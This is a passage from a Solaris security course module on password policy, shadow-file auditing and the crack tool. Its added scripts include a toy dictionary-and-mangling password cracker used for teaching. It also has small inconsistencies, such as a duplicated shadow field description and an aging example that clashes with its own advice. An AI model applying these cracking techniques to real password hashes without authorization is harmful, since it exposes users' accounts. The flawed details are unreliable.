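# Steps 2 to 5 and 8: empty read-only dotfiles, the profile, a private
# work directory, and a read-only home directory.
build_restricted_home() {
    home=$1; rbin=$2
    mkdir -p "$home/work"
    for f in $DOTFILES; do : > "$home/$f"; done
    write_restricted_profile "$home" "$rbin"
    for f in $DOTFILES; do chmod 444 "$home/$f"; done
    chmod u=rwx,og= "$home/work"
    chmod 555 "$home"
}

# Permission string from ls -ld (its first field is standardized), e.g. "-r--r--r--".
mode_of() { ls -ld "$1" | cut -c1-10; }

# Check the layout; prints each problem found and returns their number.
verify_restricted_home() {
    home=$1; rbin=$2; n=0
    case "$(mode_of "$home")" in *w*) echo "home directory is writable"; n=$((n+1)) ;; esac
    for f in $DOTFILES; do
        if [ ! -f "$home/$f" ]; then
            echo "$f missing: a utility could create it"; n=$((n+1))
        else
            case "$(mode_of "$home/$f")" in *w*) echo "$f is writable"; n=$((n+1)) ;; esac
        fi
    done
    grep -q "^PATH=$rbin\$" "$home/.profile" || { echo ".profile does not set PATH=$rbin"; n=$((n+1)); }
    case "$(mode_of "$home/work")" in drwx------) ;; *) echo "work directory is not drwx------"; n=$((n+1)) ;; esac
    for c in $RBIN_CMDS; do            # links only: private copies miss security patches
        p=$rbin/$c
        [ -L "$p" ] && continue
        links=$(ls -ld "$p" 2>/dev/null | awk '{print $2}')
        [ "${links:-0}" -gt 1 ] || { echo "$c in $rbin is not a link"; n=$((n+1)); }
    done
    return "$n"
}

# Build a scratch copy, verify it, then make one dotfile writable and
# verify again; succeeds when the first run is clean and the second finds one problem.
demo_restricted_setup() {
    scratch=$(mktemp -d)
    home=$scratch/export/home/charles; rbin=$scratch/usr/rbin
    mkdir -p "$home" "$rbin"
    for c in $RBIN_CMDS; do ln -s "/usr/bin/$c" "$rbin/$c"; done
    chmod 555 "$rbin"
    build_restricted_home "$home" "$rbin"
    clean=0; verify_restricted_home "$home" "$rbin" || clean=$?
    chmod 644 "$home/.rhosts"          # simulate a dotfile the user could edit
    broken=0; verify_restricted_home "$home" "$rbin" >/dev/null || broken=$?
    chmod -R u+w "$scratch"; rm -rf "$scratch"
    echo "problems before tampering: $clean, after: $broken"
    [ "$clean" -eq 0 ] && [ "$broken" -eq 1 ]
}
demo_restricted_setup
```

Against a real account the verify function is called as verify_restricted_home /export/home/charles /usr/rbin; the ls -ld based mode check is used instead of test -w so that the result is the same whether the check runs as root or as an ordinary user.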


Module 6

Password Security

Objectives

Upon completion of this module, you should be able to:

● List at least two measures that constitute good password practice

● Configure and use the password-cracking tool crack


Relevance


Discussion – As a conscientious system administrator, you have done the following:

● Removed all unnecessary user and system accounts

● Stopped direct login to superuser accounts

● Set secure PATH variables in the /etc/profile and /etc/default/su files

● Set automatic expiration on user accounts

● Set restricted shells for all guest users

In short, you have done everything you can to protect the accounts on your system from attack. However, you do not have control over users’ choice of password. What mechanisms are there to protect your system from weak password selection?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Garfinkel, Simson and Gene Spafford. Practical UNIX & Internet Security. O’Reilly & Associates, Inc., 1996.

● Farrow, Rik. UNIX System Security. Addison Wesley, 1991.

● Scambray, McClure, Kurtz. Hacking Exposed. Second Edition. Osborne/McGraw-Hill, 2001.

● crack documentation – manual.html from the crack archive online at: ftp://ftp.cerias.purdue.edu/pub/tools/unix/pwdutils/

● npasswd download site: ftp://ftp.cc.utexas.edu/pub/npasswd

● AntiCrack documentation and download at: http://www.teu.ac.jp/nsit/~tominaga/anticrack/


Passwords

With the increasing use of networks and the corresponding increase in network-attacking tools, secure passwords are no longer the most important aspect of good system security. However, good passwords are the first and sometimes the only defense against attacks. Intruders spend significant time and effort cracking passwords. The importance of good password selection, protection, and administration, therefore, cannot be over-emphasized.

The superuser password, which gives an intruder system-wide access, is the most important of all passwords. But individual user passwords are important as well, because they are often the first step to obtaining superuser passwords.

Revisiting the Password and Shadow Files

Before considering password selection and password-cracking tools, this section reviews the standard Solaris OE password files and utilities.


The /etc/passwd File

The /etc/passwd file contains most of the important information about user accounts. It contains the user name, the user identifier (UID), the group identifier (GID), a description field which usually stores the user’s full name and comments, the path of the user’s home directory, and the type of UNIX shell to start when the user logs on. An example of an account entry is:

alice:x:101:1:Alice:/export/home/alice:/bin/ksh

The fields, separated by a colon (:), from left to right are:

● The user name

● The dummy password field; the character ‘x’ in this field indicates that the encrypted password is in the /etc/shadow file

● The UID

● The GID


● Free text field (also known as the GCOS field), which usually stores the user’s full name and other details; be aware that data in the GCOS field might be displayed in outgoing mail headers

● The user’s home directory

● The user’s login shell

It is difficult to maintain up-to-date copies of the /etc/passwd file on every host in a large network, so the /etc/passwd file is often not used. In the Solaris OE, products such as Network Information Service (NIS) or NIS+ store passwords on a server, using a single password database. The format of the database that dispenses the passwords is similar to the password file.

Note – When using the NIS, NIS+ or Lightweight Directory Access Protocol (LDAP) repository for account and password data, encrypted passwords are passed across the network where they can be sniffed by potential attackers.

Many standard utilities, such as ls and who, use entries in the /etc/passwd file to map UIDs to user names. For this reason, the /etc/passwd file must have read privileges for the world.

In previous versions of UNIX, when the password file contained the encrypted password, crackers could simply copy the contents of the file and then use aggressive techniques to attempt to crack user passwords.

With the encrypted password now located in the /etc/shadow file, which is not readable by regular users, attacks of this kind are no longer possible.

However, do not assume that your password system is secure. Getting a list of users and groups, and where their home directories are, can be the first step in the process of breaking in, and the /etc/shadow file can be copied during even brief access to the root account.


The /etc/shadow File

Shadow passwords were introduced to increase security. The /etc/shadow file stores encrypted passwords in much the same way as the /etc/passwd file used to. Because the /etc/shadow file is only readable by the superuser, the encrypted passwords and other important account information (such as account and password aging parameters) cannot be viewed by regular users.

An example of an account entry in the /etc/shadow file is:

alice:sDWSmgh1MzcO2:11428:10:100:5:20:11503:

The fields, separated by a colon (:), from left to right are:

● The user name

● The encrypted password

● The number of days since January 1, 1970, that the password was modified

● The minimum number of days required between password changes

● The minimum number of days required between password changes


● The maximum number of days the current password is valid

● The number of days warning that the password will expire

● The number of days of inactivity the account is allowed before it expires

● The date on which the account expires, expressed as the number of days since January 1, 1970

There are many programs that analyze the data in these fields and manage password and account aging and expiration. These are discussed later in this module (see “Configuring Password Aging” on page 6-16).

Make sure that no backup copies of the /etc/shadow file on your system are publicly readable.
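The following POSIX sh functions are an added example, not part of the Sun course. They put the field layout just described, together with the *LK* and NP password-field conventions from Module 5 (“Protecting Dormant Accounts” and “Classifying Non-Login Accounts”), into one classifier: given a shadow entry and the current day count since January 1, 1970, it reports whether the password is set, locked, NP or empty, whether password aging has expired or is in its warning period, and whether the account expiration date has passed. The day counts and all entries except the alice line shown above are constructed for the demonstration; the inactivity field is only reported, because the days-since-last-login value it is compared against is not kept in /etc/shadow.

```shell
# Added example (not part of the Sun course): classify an /etc/shadow entry
# using the field layout above. shadow_status LINE TODAY, where TODAY is the
# current day count since 1 January 1970 (on a live system:
# $(( $(date +%s) / 86400 )) ). Prints space-separated tags and returns 0
# if login is possible today, 1 if it is blocked (locked, NP or expired).
shadow_status() {
    line=$1; today=$2
    set -f                          # no globbing: the password field may be *LK*
    oldIFS=$IFS; IFS=:
    set -- $line
    IFS=$oldIFS; set +f
    pw=$2; lastchg=$3; min=$4; max=$5; warn=$6; inact=$7; expire=$8
    tags=""; blocked=0
    case "$pw" in
        '*LK*') tags="locked"; blocked=1 ;;        # set by passwd -l
        NP)     tags="no-login"; blocked=1 ;;      # system account convention
        '')     tags="no-password" ;;              # anyone can log in: a finding
        *)      tags="password-set" ;;
    esac
    # Password aging applies only when both the last-change and max fields are set.
    if [ -n "$lastchg" ] && [ -n "$max" ]; then
        due=$((lastchg + max))
        if [ "$today" -gt "$due" ]; then
            tags="$tags password-expired"           # login will force a new password
        elif [ -n "$warn" ] && [ "$today" -ge $((due - warn)) ]; then
            tags="$tags password-expiring"
        fi
    fi
    # Account expiration: the expire field is the first day the login is refused.
    if [ -n "$expire" ] && [ "$today" -ge "$expire" ]; then
        tags="$tags account-expired"; blocked=1
    fi
    [ -n "$inact" ] && tags="$tags inactivity-limit:$inact"
    echo "$tags"
    return "$blocked"
}

# Constructed sample entries; the alice line is the one shown above.
SAMPLE_SHADOW='alice:sDWSmgh1MzcO2:11428:10:100:5:20:11503:
daemon:NP:6445::::::
bob:*LK*:11428::::::
guest::11428::::::'

# Report every entry of a shadow-format text for a given day; returns the
# number of entries that can still log in.
shadow_report() {
    today=$2; open=0
    while IFS= read -r entry; do
        [ -n "$entry" ] || continue
        name=${entry%%:*}
        if tags=$(shadow_status "$entry" "$today"); then
            open=$((open + 1))
        fi
        printf '%-8s %s\n' "$name" "$tags"
    done <<EOF
$1
EOF
    return "$open"
}

# Day 11500 is 72 days after alice's last password change and 3 days
# before her account expiration date.
shadow_report "$SAMPLE_SHADOW" 11500 || echo "accounts able to log in: $?"
```

Run against a copy of a real file (shadow_report "$(cat /etc/shadow)" "$(( $(date +%s) / 86400 ))" as root), the no-password tag is the one to act on first, since an empty second field lets anyone log in to that account.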


Setting a Password Policy

To have a secure password policy, you must first address the issue of user education. You should:

● Impress upon users the importance of keeping their passwords secret. Emphasize that this is not a casual topic and that sharing them with other users, family, or even system administrators is a very serious mistake.

● Explain that, if possible, passwords should not be written down. If they must be written down, make sure they are written in a secure place. A technique used by some intruders is to observe an unwary user logging onto a workstation at the start of a workday. If the user is seen glancing into a desk drawer or an address book, the user might as well write the password down and give it to the intruder.

● Users with different types of accounts (for example, a system account and a non-administrator account) should use different passwords for each.

● Prohibit storage of unencrypted passwords on the system or online. Allow no exceptions.


● Discuss with users the techniques that crackers might use to obtain their passwords. For example, crackers might disguise themselves as system administrators and send out emails asking users to email their passwords to them. Tell users that they should ignore such messages and report them immediately.

● Consider assigning each user a password and then removing execute permission from the /bin/passwd file for ordinary users, so that the assigned password cannot be changed.

● Never create a single account for use by multiple users sharing a single password. Accounts like this are often viewed as less important than personal accounts and the password is often known by many more people than necessary. If someone breaks in using a shared password, accountability is virtually impossible to prove. Instead, create individual accounts with a group identifier in the /etc/group file so that users can share files.

● Without exception, do not give the superuser password to anyone that is not a trusted member of your staff with the same responsibility level as you. Keep the number of people who have this privilege to a minimum. Remember that every new person who knows this password becomes a new target for intruders both within and outside the organization.

● Consider using tools like Role-Based Access Control (RBAC) and sudo (see Module 7, “Securing Root Access”) rather than handing out the password to the root account to administrators.


Choosing Good Passwords

Password-cracking is a science that is in continuous development by security experts and intruders alike. Fast computers and creative programs can test millions of passwords per second. Nevertheless, following certain conventions when choosing passwords (using at least six characters, selected at random from the full set of characters on the keyboard) makes exhaustive search expensive: six random characters drawn from the 95 printable ASCII characters give about 7 x 10^11 combinations, which a cracker testing a million guesses per second exhausts in about a week, while the eight characters that the traditional UNIX crypt() algorithm actually uses give about 6.6 x 10^15 combinations, which keeps the same cracker busy for centuries.

Unfortunately, users rarely choose a completely random set of characters. That is why password-cracking programs take a more intelligent approach: they start with dictionaries and lists of common words, names, and commonly used passwords from the past.

Given this, it is important to select passwords that are virtually impossible to guess. Unfortunately, that can also make them difficult to remember, forcing users to write them down, which is also undesirable. The trick is to find a password that balances all of these factors. When you have a password that achieves this balance, memorize it, and then keep it secret.


Users might protest the requirement that they use passwords that are hard to remember. Nevertheless, do not allow them to use easily guessed passwords.

Note – The Solaris 8 OE passwd command insists that a regular user enter a password of at least six characters (the PASSLENGTH default in /etc/default/passwd), the first six of which must contain at least two letters and at least one number or special character.

Use and communicate the following list of guidelines when selecting or assigning passwords:

● Do not use any word found, even in part, in the dictionary of any language – Password-cracking programs use dictionaries as a starting point. Prefixing or appending numerals to such words slows the cracking process only slightly.

● Do not use a combination of the letters of your real name, user name, initials, or nickname – Reversing the order of the letters or scrambling them creates passwords that are easy to crack.

● Do not use a combination of the letters of a famous person's name.

● Do not use a combination of the letters of a spouse's, girlfriend's, boyfriend's, child's, or pet's name – An intruder who knows your name can find out this information and add it to the list of cracking possibilities.

● Do not use personalized numbers – For example, avoid social security numbers, license plates, telephone numbers, bank personal identification numbers, street addresses, or your favorite car model.

● Do not use a password containing only digits, or all the same letter.

● Do not use a password that is shorter than six characters – The Solaris OE does not let a regular user do this, but it lets the superuser set shorter passwords. There is also little point in choosing a very long password: the traditional crypt() algorithm used by the Solaris 8 OE hashes only the first eight characters, so anything beyond them is ignored.

Note – The superuser can simply press the Return key when prompted for a new password, which sets an empty password. This is not the same as having no password at all, and it will not be spotted by automated utilities designed to detect accounts with no password: an encrypted password (the hash of the empty string) still appears in the /etc/shadow file, yet anyone who presses Return at the Password prompt is let in.

Recommendations for what users should do include:

● Use a password with mixed-case letters – Capitalizing only the first letter is not sufficient. Mix the case in the middle of the word as well.


● Use a password that can be typed quickly – This reduces the chance of someone watching you and committing the keystrokes to memory as you type them (this kind of watching is called shoulder surfing).

● Use a password that contains special characters – Use characters such as ^, $, +, and ~.

The Mnemonic Method – A Way to Remember

A popular way to create secure passwords and remember them is to start with a phrase that you will remember. Take the first letter of each word of the phrase and then insert as many numerals or special characters as you can.

Another popular technique is to replace some letters with digits.

The most common replacements are:

● Letter i with the digit 1

● Letter o with the digit 0

● Letter s with the digit 5

But the following replacements are also often seen:

● Letter e with the digit 3 (think of a mirror image of a capital E)

● Letter b with the digit 6

● Letter l or v with the digit 7 (think of a capital L or V rotated by 180 or 90 degrees respectively)

Taken to extremes, this turns the password obelisk into 063715k.

Note – Using the digits 1 and 0 to replace the letters i and o is so common that password-cracking programs such as crack and John the Ripper test for letter-digit substitutions as a matter of course, so a dictionary word with its letters replaced by digits is still, for cracking purposes, a dictionary word.

For example, you can use the phrase another fine mess to clean up to remember the password aFm2c^.

Other examples are:

● 14$24sh0 – One for the money, two for the show

● mm@F:00 – Meet me at four o'clock


Using Multiple Words

Using passwords made of multiple words combined with a special character or digit is another good technique. For example:

● head2head

● sound&vision

● ew&fire

● dash-dash

● dot.dot

However, now that these passwords are listed in this text, they could end up in someone's password-cracking dictionary, so do not use them. Come up with original ones, and keep them secret!


Revisiting the passwd Command

You can create and change passwords using the passwd command. The passwd command is accessible to both regular users and the superuser, but users can only change their own passwords, while the superuser can change any user's password. Users wanting to change their password must first enter their existing password for authentication (consult the manual page for passwd for the other options).

Code 6-1 shows an example of how a user would change his or her password. In reality, the password is not echoed to the screen as it is typed, but it is shown here for convenience.

Code 6-1 Example of a User Changing His or Her Password

% passwd
passwd: Changing password for groucho
Enter login password: my_PassWD*
New password: my_PassWD2
passwd(SYSTEM): Passwords must differ by at least 3 positions
New password: hello
passwd(SYSTEM): Password too short - must be at least 6 characters.
New password: groucho
passwd(SYSTEM): The first 6 characters of the password must contain at least two alphabetic characters and at least one numeric or special character.
passwd(SYSTEM): Too many failures - try later.
Permission denied

Regular users are restricted in what they can enter as a new password, and the new password must not be too similar to the old one. The passwd command gives up after three unsuccessful attempts to change the password. These restrictions do not apply to the superuser, who can enter any characters. Also, the superuser is not required to enter the old password before entering the new one.

The superuser can change any user's password. Because the passwd command does not check a password entered by the superuser against the security criteria, it is the superuser's responsibility to make sure that the new password is secure. To change a user's password, the superuser enters the passwd command followed by the user name, as shown in Code 6-2.

Code 6-2 Example of Superuser Changing a Password

# passwd groucho
New password: afm2c^
Re-enter new password: afm2c^
passwd (SYSTEM): passwd successfully changed for groucho
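The regular-user checks seen in Code 6-1 and the superuser bypass described above, modelled in Python as an added example (this is not Sun's passwd source). The rules are the ones the passwd(1) manual page lists: the PASSLENGTH minimum, the composition of the first six characters, no reverse or circular shift of the login name, and at least three positions different from the old password, compared case-insensitively. The message wording, the order of the checks and the three-strikes limit are taken from the transcript; the login name marx2001 used in the usage note is made up.

```python
"""Model of the checks the Solaris 8 passwd command applies to a regular
user's new password (added example; not Sun's code)."""

PASSLENGTH = 6   # default in /etc/default/passwd on Solaris 8


def _shifts(s):
    """All circular shifts of s, used for the login-name comparison."""
    return {s[i:] + s[:i] for i in range(len(s))}


def check_new_password(login, old, new, passlength=PASSLENGTH):
    """Return None if `new` is acceptable, otherwise the rejection message.

    Checks run in the order the transcript in Code 6-1 shows:
    length, composition, login-name relationship, difference from old."""
    if len(new) < passlength:
        return "Password too short - must be at least %d characters." % passlength

    head = new[:6]
    alpha = sum(1 for c in head if c.isalpha())
    other = len(head) - alpha              # numeric or special characters
    if alpha < 2 or other < 1:
        return ("The first 6 characters of the password must contain at least "
                "two alphabetic characters and at least one numeric or special "
                "character.")

    lname, lnew = login.lower(), new.lower()
    if lnew in _shifts(lname) or lnew in _shifts(lname[::-1]):
        return "Password must not be a reverse or circular shift of the login name."

    lold = old.lower()
    # Positions that differ, counting any length difference as differing.
    differ = sum(1 for a, b in zip(lold, lnew) if a != b) + abs(len(lold) - len(lnew))
    if differ < 3:
        return "Passwords must differ by at least 3 positions"
    return None


def passwd_session(login, old, attempts, privileged=False):
    """Replay a sequence of new-password attempts the way passwd does.

    A regular user gets three tries before "Too many failures"; the
    superuser (privileged=True) is not checked at all, as the text says."""
    messages = []
    failures = 0
    for candidate in attempts:
        reason = None if privileged else check_new_password(login, old, candidate)
        if reason is None:
            messages.append("passwd (SYSTEM): passwd successfully changed for %s" % login)
            return messages
        failures += 1
        messages.append("passwd(SYSTEM): " + reason)
        if failures == 3:
            messages.append("passwd(SYSTEM): Too many failures - try later.")
            messages.append("Permission denied")
            return messages
    return messages


if __name__ == "__main__":
    # Reproduces the three rejections of Code 6-1, then the superuser case.
    for line in passwd_session("groucho", "my_PassWD*", ["my_PassWD2", "hello", "groucho"]):
        print(line)
    print(passwd_session("groucho", "", ["afm2c^"], privileged=True)[-1])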

Configuring Password Aging

The password aging facility allows you to constrain the way in which users change their passwords and prevents them from using the same familiar password for years. Unfortunately, it does not stop them from recycling two or three favorites one after the other.

The passwd command has several options that manage passwords and their aging and expiration. Some of these options are shown in Table 6-1 on page 6-17.


Use password aging to ensure that users' passwords are changed regularly, but not so often as to annoy users. (Once every three or four months is a good compromise.)

Unfortunately, most users, when forced to change their password, revert to their original password as soon as they can. Set a long minimum time, to force users to become used to the new password. Typically, give users seven days to change their password, and set the warning period to seven days as well.

A typical aging command, which sets a minimum of 115 days between changes, a maximum of 122 days, and a seven-day warning, is:

# passwd -n 115 -x 122 -w 7 username

Faced with frequent password changes, users often grow lazy and resort to passwords that defeat the purpose of password aging. For example, users who must change their passwords every month soon run out of useful passwords and take one of the following actions (in probable order of occurrence):

● Cycle through two or three favorite passwords.

● Modify the same password using a simple cycle, such as adding the month number or name to the start or end of the password, or using star-sign abbreviations.

● Think up a good password and then forget it by lunch time, so that they have to get help resetting their password.

● Pretend they have forgotten their new password and get you to reset it, so that they can enter their previous password and bypass the enforced change.

Unfortunately, there is not much you can do to prevent this. As long as the password selected is a secure one, there is no real harm. Reinforce with your users the password selection policy described earlier (see "Setting a Password Policy" on page 6-9), and follow the steps to check for weak passwords with crack or other tools (see "Using the crack Tool to Find Weak Passwords" on page 6-27).

Table 6-1 Options for Managing Password Aging

Option   Meaning
-x       Sets the number of days from when the password was last changed to when it expires
-w       Sets how many days' warning the user is given before the password expires
-n       Sets the minimum number of days that must pass before the password can be changed again
-f       Forces the user to change the password at the next login
-l       Sets the encrypted password to *LK*, which prevents the user from logging in
-s       Lists the current aging parameters of an account's password

Configuring Default Password Aging

Restrictions on passwords can be controlled for all non-administrator users by adding entries to the /etc/default/passwd file. By setting the variables shown in Table 6-2, you manage the default password expiration periods and other password requirements that apply when users change their passwords.

Table 6-2 Setting Default Password Expiration Periods

Code          Meaning
MAXWEEKS=17   The user must change the password at least every 17 weeks (about four months).
MINWEEKS=4    Four weeks must elapse before the password can be changed again.
WARNWEEKS=1   A warning is given one week before the password must be changed.
PASSLENGTH=8  The password must contain at least eight characters. (Values above 8 add nothing, because the traditional crypt() algorithm uses only the first eight characters.)


Checking for Accounts With No Password

Even though you can create accounts without passwords, doing so is asking for trouble. Even though there are no restrictions on what the superuser can use for a password, you never want to create an account without one.

Because it is possible to create accounts without passwords, it is also possible to check whether such accounts exist. Use the logins command with the -p option to list any user on the system who has no password. The following example indicates that user groucho is missing a password:

# logins -p
groucho           401     other             1

The first time a user logs in to an account that has no password, the user must set a password. However, if the user logging in is an intruder, the intruder sets the password and thereby gains unrestricted access to that account. In the extremely unlikely event of the superuser having no password, the intruder can continue to log in without a password time after time, without any restriction.


Certain special accounts, such as sys and bin, have a special 'no password' status, indicated by NP in the encrypted-password field of the /etc/shadow file. This means that there is no valid password entry for these accounts, so they cannot be used for interactive login sessions. Note that logins -p does not report them: it reports only an empty password field.
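The checks in this section and the aging settings of Table 6-1 and Table 6-2, applied together to an /etc/shadow and an /etc/default/passwd in Python, as an added example rather than anything from the course. It reports the empty password field that logins -p reports, and also conditions logins -p ignores: accounts with no aging at all, a per-account maximum longer than MAXWEEKS allows, and passwords already past their maximum age. The sample entries, hashes and dates are constructed; NP and *LK* entries are skipped because they cannot log in interactively, and the empty-string hash that the superuser can set is not detectable here without crypt(3C).

```python
"""Audit of Solaris-style /etc/shadow entries against /etc/default/passwd.
Added example, not Sun's code: the sample file contents, hashes and dates
below are constructed."""

# Constructed /etc/shadow sample.  Fields per shadow(4):
# name:password:lastchg:min:max:warn:inactive:expire:flag (days since 1970-01-01)
SAMPLE_SHADOW = """\
root:rJ9x0Cq4Wf2Uo:11500:7:119:7:::
groucho::11560:::::
alice:aBcD.1e2F3gHi:11560:115:119:7:::
bob:bObBoB9Zk5qp2:11200:7:182:7:::
eve:eV3aDaM7mNoPq:11560:::::
sys:NP:6445::::::
bin:NP:6445::::::
"""

# Constructed /etc/default/passwd with the values from Table 6-2.
SAMPLE_DEFAULT_PASSWD = """\
# /etc/default/passwd (constructed sample)
MAXWEEKS=17
MINWEEKS=4
WARNWEEKS=1
PASSLENGTH=8
"""

TODAY = 11560   # days since 1970-01-01, late August 2001 (assumed audit date)


def _num(field):
    """Shadow numeric fields are optional; empty means 'not set'."""
    return int(field) if field else None


def parse_shadow(text):
    """Return one dict per non-comment line of shadow(4)-format text."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = (line.split(":") + [""] * 9)[:9]
        entries.append({"name": f[0], "password": f[1], "lastchg": _num(f[2]),
                        "min": _num(f[3]), "max": _num(f[4]), "warn": _num(f[5])})
    return entries


def parse_default_passwd(text):
    """Parse the KEY=VALUE lines of /etc/default/passwd, ignoring comments."""
    cfg = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            cfg[key.strip()] = value.strip()
    return cfg


def audit_shadow(shadow_text, default_text, today=TODAY):
    """Map each account that has a finding to its list of finding codes.

    EMPTY              no password at all (what `logins -p` reports)
    NO_AGING           no maximum age, so the password never expires
    MAX_EXCEEDS_POLICY per-account -x value longer than MAXWEEKS allows
    EXPIRED            lastchg + max is already in the past"""
    cfg = parse_default_passwd(default_text)
    policy_max = int(cfg["MAXWEEKS"]) * 7 if cfg.get("MAXWEEKS") else None
    findings = {}
    for e in parse_shadow(shadow_text):
        codes = []
        if e["password"] == "":
            codes.append("EMPTY")
        elif e["password"] == "NP" or e["password"].startswith("*LK*"):
            continue                      # no interactive login possible
        elif e["max"] is None:
            codes.append("NO_AGING")
        else:
            if policy_max is not None and e["max"] > policy_max:
                codes.append("MAX_EXCEEDS_POLICY")
            if e["lastchg"] is not None and e["lastchg"] + e["max"] < today:
                codes.append("EXPIRED")
        if codes:
            findings[e["name"]] = codes
    return findings


if __name__ == "__main__":
    for name, codes in sorted(audit_shadow(SAMPLE_SHADOW, SAMPLE_DEFAULT_PASSWD).items()):
        print("%-8s %s" % (name, ", ".join(codes)))
```

On a real system, read /etc/shadow as root and pass today's date as days since the epoch; the per-account values that passwd -n, -x and -w set are the min, max and warn fields the audit inspects.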


Using Password Generators

In some special, high-security situations, it might be necessary to pre-qualify a password before a user can use it. There are many programs that generate a list of secure passwords for a user to select from. These passwords are built from randomly chosen characters and are virtually impossible for cracking programs to guess.

Unfortunately, because the generated passwords are random sequences of characters, they are easy to forget. Users generally want to write them down somewhere. Therefore, use generated passwords only when necessary.

Less secure, but more usable, password generators combine multiple (often related) words from the dictionary.


Another approach is to have users submit a password that they feel they can remember, and then run the password through a password-cracking program (see "Using the crack Tool to Find Weak Passwords" on page 6-27). If the password is not cracked in a reasonable time, accept it and assign it to the user.


One-Time Passwords

Because passwords can easily be 'sniffed' when users regularly access the system over the Internet or a network (protocols such as telnet, rlogin, and ftp send them in the clear), consider the use of one-time passwords. As the name implies, a one-time password is a password that is used only once, so one that has been captured is of no further use to the intruder.

Two popular one-time password systems are:

● One-time Passwords In Everything (OPIE) [http://www.inner.net/opie]

● S/Key [ftp://ftp.cerias.purdue.edu/pub/tools/unix/netutils/skey/]

Many systems are available that use smart cards, password generators, or code books, and many vendors supply them.


One of the most secure is SecurID, which requires each user to carry a small number generator about the size of a large key fob or a small cigarette lighter. The number generator provides a new (numeric) password every 60 seconds. A matching generator on the server maintains the value expected for the user's account. The password the user enters usually includes a four- to eight-digit PIN, which must be combined with the generated number, providing additional security against theft of the number generator.


Cracking Password Programs

A less drastic approach to password security than preventing users from picking their own passwords, or using password generators, is to test users' passwords to identify those that are easy to guess. It is relatively easy to write your own password-cracking program, but a number are also freely available. The most well known include:

● crack

● John the Ripper

● monkey

● L0phtCrack, for Microsoft Windows


Cracking Passwords Using the crack Tool

The crack tool is a utility that guesses passwords by encrypting words or sets of characters and comparing them to the encrypted passwords in the /etc/shadow file. The crack tool is therefore only useful to an intruder who has obtained a copy of the /etc/shadow file (or of a merged passwd/shadow file).

The advantage of password-cracking, from the intruder's point of view, is that it can be done offline: once the encrypted passwords have been obtained, there is no evidence on the system that anything unusual is happening, and no failed login attempts are recorded.

The crack tool draws its input from a number of dictionary files. It also applies thousands of rules to the dictionary words to try to guess passwords that would otherwise seem impossible to crack. The dictionaries are updated and expanded on an ongoing basis to include everything from U.S. presidents to Star Trek terms. The crack tool also adds the words in the GCOS field of the /etc/passwd file (the user's full name, office, and so on) to its dictionary list, which is why it does better on a merged passwd/shadow file than on /etc/shadow alone.
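How a crack-style tool turns one dictionary or GCOS word into many guesses, as an added Python example (not the crack tool's own code, and with a handful of rules rather than its thousands). It also serves the guidelines in "Choosing Good Passwords" and the note on letter-digit substitution: with the substitutions from that section as rules, obelisk written as 063715k and the doubled login name b0bb0b both fall, while the phrase-derived aFm2c^ and 3v3adam do not. A salted SHA-256 stand-in replaces crypt(3C) so that the block runs anywhere (an assumption, clearly not the DES-based hash Solaris 8 stores); the sample accounts, hashes and GCOS fields are constructed.

```python
"""Toy password cracker showing dictionary words, mangling rules and GCOS
words at work (added example; not the crack tool's code)."""
import hashlib
import re

# The letter-digit substitutions the text lists: three common, four extra.
COMMON = {"i": "1", "o": "0", "s": "5"}
EXTRA = {"e": "3", "b": "6", "l": "7", "v": "7"}
ALL = {**COMMON, **EXTRA}


def toy_hash(password, salt):
    """Stand-in for crypt(3C): two-character salt + truncated salted SHA-256.
    Assumption for portability; real crack computes the DES-based crypt()."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return salt + digest[:22]


def substitute(word, table):
    return "".join(table.get(c, c) for c in word)


def mangle(word):
    """Yield candidates derived from one word by the rules the text describes:
    case changes, reversal, doubling, letter-digit substitutions (every
    substitutable letter, or one at a time) and a numeral prefix or suffix."""
    w = word.lower()
    seen = set()
    for base in (w, w.capitalize(), w.upper(), w[::-1], w + w):
        candidates = [base, substitute(base, COMMON), substitute(base, ALL)]
        candidates += [base[:i] + ALL[c] + base[i + 1:]
                       for i, c in enumerate(base) if c in ALL]
        candidates += [base + d for d in "0123456789"]
        candidates += [d + base for d in "0123456789"]
        for cand in candidates:
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack(entries, wordlist):
    """entries: (login, stored_hash, gcos) tuples as in a merged
    passwd/shadow file.  Returns {login: recovered_password}."""
    recovered = {}
    for login, stored, gcos in entries:
        salt = stored[:2]
        # Per account: the login name and the GCOS words, then the dictionary.
        words = [login] + [w for w in re.split(r"[ ,]+", gcos) if w] + list(wordlist)
        for word in words:
            hit = next((c for c in mangle(word) if toy_hash(c, salt) == stored), None)
            if hit is not None:
                recovered[login] = hit
                break
    return recovered


# Constructed merged-file sample (login, hash, GCOS); not real accounts.
SAMPLE_ENTRIES = [
    ("bob", toy_hash("b0bb0b", "aB"), "Bob Builder,Room 101"),
    ("alice", toy_hash("w0nder", "cD"), "Alice Liddell,Room 102"),
    ("eve", toy_hash("3v3adam", "eF"), "Eve Adam,Room 103"),
    ("groucho", toy_hash("aFm2c^", "gH"), "Groucho Marx,Room 104"),
    ("stone", toy_hash("063715k", "iJ"), "Stone Mason,Room 105"),
]
SAMPLE_WORDLIST = ["password", "wonder", "obelisk", "sunshine", "secret"]

if __name__ == "__main__":
    for login, pw in sorted(crack(SAMPLE_ENTRIES, SAMPLE_WORDLIST).items()):
        print("%-8s %s" % (login, pw))
```

bob falls to the doubled login name with the common substitutions applied, alice to a single o-to-0 change in a dictionary word, and stone to the complete substitution of obelisk; eve and groucho survive because no rule reaches a two-word mixture or a phrase abbreviation. Adding a rule for each trick users adopt is exactly how the real tool's rule set grew.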


Using the crack Tool to Find Weak Passwords

Running crack (or a similar tool) on a regular basis is a useful security check, but do not use it as an alternative to educating your users to select secure passwords.

If the crack tool finds an account with an insecure password, disable the account immediately or, at least, change the password, and notify the owner.


Installing and Running the crack Tool

The crack version 5.0 package can be downloaded from the following location and must be compiled locally:

ftp://ftp.cerias.purdue.edu/pub/tools/unix/pwdutils/

The crack tool produces more useful output if the files /etc/passwd and /etc/shadow are merged to create a file in the format of an old UNIX C1 password file (the encrypted password in the second field, alongside the GCOS data). The crack tool provides a script to do this. Use this merged file as the input to the crack tool.

